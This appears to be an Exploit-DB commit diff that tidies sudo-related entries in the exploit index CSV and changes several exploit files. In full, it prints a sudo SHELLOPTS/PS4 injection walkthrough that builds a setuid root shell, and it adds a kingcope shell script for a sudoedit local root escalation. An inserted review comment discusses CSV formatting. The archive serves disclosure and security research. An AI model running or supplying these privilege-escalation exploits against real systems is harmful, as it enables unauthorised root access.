DB: 2016-03-13

1 new exploit
This commit is contained in:
Offensive Security 2016-03-13 05:03:14 +00:00
parent fe74e95fff
commit fe689417a1
5 changed files with 95 additions and 70 deletions


@ -298,7 +298,7 @@ id,file,description,date,author,platform,type,port
315,platforms/windows/remote/315.txt,"Microsoft Outlook Express Javascript Execution Vulnerability",2004-07-13,N/A,windows,remote,0
316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0
319,platforms/linux/local/319.c,"sudo.bin NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0
319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0
320,platforms/linux/local/320.pl,"suid_perl 5.001 Vulnerability",1996-06-01,"Jon Lewis",linux,local,0
321,platforms/multiple/local/321.c,"BSD & Linux - umount Local Root Exploit",1996-08-13,bloodmask,multiple,local,0
322,platforms/linux/local/322.c,"Xt Library Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0
@ -895,7 +895,7 @@ id,file,description,date,author,platform,type,port
1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0
1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0
1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0
1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)",2005-07-04,RusH,bsd,local,0
1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p - Pathname Validation Local Root Exploit (OpenBSD)",2005-07-04,RusH,bsd,local,0
1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0
1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0
1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0
@ -1089,7 +1089,7 @@ id,file,description,date,author,platform,type,port
1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 SQL Injection / Command Execution Exploit",2005-11-07,rgod,php,webapps,0
1299,platforms/linux/local/1299.sh,"SuSE Linux <= 9.3 / 10 - (chfn) Local Root Privilege Escalation Exploit",2005-11-08,Hunger,linux,local,0
1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Local Root Exploit",2005-11-09,"Charles Stevenson",linux,local,0
1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0
1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0
1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure Exploit",2005-11-09,kingcope,bsd,local,0
1312,platforms/php/webapps/1312.php,"Moodle <= 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0
1313,platforms/windows/remote/1313.c,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
@ -10658,7 +10658,7 @@ id,file,description,date,author,platform,type,port
11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus _V4.rgo_ (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0
11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
@ -13633,7 +13633,7 @@ id,file,description,date,author,platform,type,port
15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0
15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0
15699,platforms/php/webapps/15699.txt,"PhpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation (Full Nelson)",2010-12-07,"Dan Rosenberg",linux,local,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
@ -18203,7 +18203,7 @@ id,file,description,date,author,platform,type,port
20898,platforms/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation Vulnerability",2001-05-18,jenggo,linux,local,0
20899,platforms/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability",2001-06-05,3APA3A,windows,remote,0
20900,platforms/linux/local/20900.txt,"Exim 3.x Format String Vulnerability",2001-06-06,"Megyer Laszlo",linux,local,0
20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0
20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 - Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0
20902,platforms/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow Vulnerability",2001-06-05,qitest1,linux,remote,0
20903,platforms/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 File Disclosure Vulnerability",2001-03-31,"Georgi Guninski",windows,remote,0
20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
@ -18513,7 +18513,7 @@ id,file,description,date,author,platform,type,port
21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service Vulnerability",2012-09-10,halfdog,lin_x86-64,dos,0
21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability",2002-01-14,aT4r,windows,remote,0
21226,platforms/linux/local/21226.c,"IMLib2 Home Environment Variable Buffer Overflow Vulnerability",2002-01-13,"Charles Stevenson",linux,local,0
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0
21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,dos,0
21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0
21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x - Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0
@ -18698,7 +18698,7 @@ id,file,description,date,author,platform,type,port
21416,platforms/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service Vulnerability",2002-04-24,"Berend-Jan Wever",windows,dos,0
21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0
21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion Vulnerability",2012-09-20,L0n3ly-H34rT,php,webapps,0
21420,platforms/linux/local/21420.c,"Sudo 1.6.x Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0
21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0
21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x Login Bypass Vulnerability",2002-04-25,"Ulf Harnhammar",php,webapps,0
21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting Vulnerability",2002-04-25,frog,linux,remote,0
21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 Image Tag Script Injection Vulnerability",2002-04-25,frog,php,webapps,0
@ -21770,7 +21770,7 @@ id,file,description,date,author,platform,type,port
24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0
24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0
24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability",2004-09-16,"Jason Summers",windows,dos,0
24606,platforms/linux/local/24606.c,"Sudo 1.6.8 Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0
24606,platforms/linux/local/24606.c,"Sudo 1.6.8 - Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0
24607,platforms/windows/remote/24607.txt,"Google Toolbar 1.1.x About.HTML HTML Injection Vulnerability",2004-09-17,ViperSV,windows,remote,0
24608,platforms/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0
24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 Insecure Temporary File Creation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0
@ -23630,7 +23630,7 @@ id,file,description,date,author,platform,type,port
26495,platforms/windows/remote/26495.py,"PCMan's FTP Server 2.0 - Remote Buffer Overflow Exploit",2013-06-30,Chako,windows,remote,0
26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080
26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer RM File Remote Stack Based Buffer Overflow Vulnerability",2005-11-10,nolimit,windows,remote,0
26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0
26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0
26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0
26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.PHP File Parameter SQL Injection Vulnerability",2005-11-12,A.1.M,php,webapps,0
26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 Admin Control Panel Username SQL Injection Vulnerability",2005-11-12,bhs_team,php,webapps,0
@ -24187,7 +24187,7 @@ id,file,description,date,author,platform,type,port
27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability",2006-01-09,ad@heapoverflow.com,windows,dos,0
27056,platforms/linux/local/27056.pl,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
27057,platforms/linux/local/27057.py,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2)",2006-01-09,"Breno Silva Pinto",linux,local,0
27058,platforms/php/webapps/27058.txt,"PHPNuke 7.7 EV Search Module SQL Injection Vulnerability",2006-01-09,Lostmon,php,webapps,0
27059,platforms/php/webapps/27059.txt,"Xoops Pool Module IMG Tag HTML Injection Vulnerability",2006-01-09,night_warrior771,php,webapps,0
@ -25051,7 +25051,7 @@ id,file,description,date,author,platform,type,port
27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,metasploit,php,remote,0
27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
27943,platforms/windows/remote/27943.txt,"Oracle Java ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0
27944,platforms/osx/local/27944.rb,"Mac OS X Sudo Password Bypass",2013-08-29,metasploit,osx,local,0
27944,platforms/osx/local/27944.rb,"Mac OS X - Sudo Password Bypass",2013-08-29,metasploit,osx,local,0
27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting Vulnerability",2006-06-02,The_BeKiR,asp,webapps,0
27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0
27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
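Review bot: The 27057 row directly under the rewritten 27056 row keeps the old un-dashed description style ("Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2)") while its sibling 27056 is normalized to "Sudo 1.6.x - Environment Variable Handling Security Bypass Vulnerability (1)"; the two are a numbered pair and should be normalized together, `27057,platforms/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass Vulnerability (2)",2006-01-09,"Breno Silva Pinto",linux,local,0`. The 11651 row also changes its file path from platforms/multiple/local/11651.txt to 11651.sh, matching the script added in this commit, but no removal of the old 11651.txt appears among the five changed files, so the previous file may be left orphaned alongside the new one — worth confirming. The section is truncated by the forge, so rows outside the shown hunks were not reviewed.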



@ -67,6 +67,6 @@ snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]);
system((char *)path);
}
}
}
// milw0rm.com [2005-07-04]
}
// milw0rm.com [2005-07-04]


@ -1,52 +1,52 @@
## Sudo local root escalation privilege ##
## vuln versions : sudo < 1.6.8p10
## by breno
## You need sudo access execution for some bash script ##
## Use csh shell to change SHELLOPTS env ##
ie:
%cat x.sh
#!/bin/bash -x
echo "Getting root!!"
%
##
##
# cat /etc/sudoers
...
breno ALL=(ALL) /home/breno/x.sh
..
#
## Let's use an egg shell :)
%cat egg.c
#include <stdio.h>
int main()
{
setuid(0);
system("/bin/sh");
}
%
% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#
# milw0rm.com [2005-11-09]
## Sudo local root escalation privilege ##
## vuln versions : sudo < 1.6.8p10
## by breno
## You need sudo access execution for some bash script ##
## Use csh shell to change SHELLOPTS env ##
ie:
%cat x.sh
#!/bin/bash -x
echo "Getting root!!"
%
##
##
# cat /etc/sudoers
...
breno ALL=(ALL) /home/breno/x.sh
..
#
## Let's use an egg shell :)
%cat egg.c
#include <stdio.h>
int main()
{
setuid(0);
system("/bin/sh");
}
%
% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#
# milw0rm.com [2005-11-09]


@ -57,6 +57,6 @@ main(int argc, char **argv)
execl(PATH_SUDO, "sudo.bin","bash", NULL);
}
// milw0rm.com [1996-02-13]
// milw0rm.com [1996-02-13]


@ -0,0 +1,25 @@
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1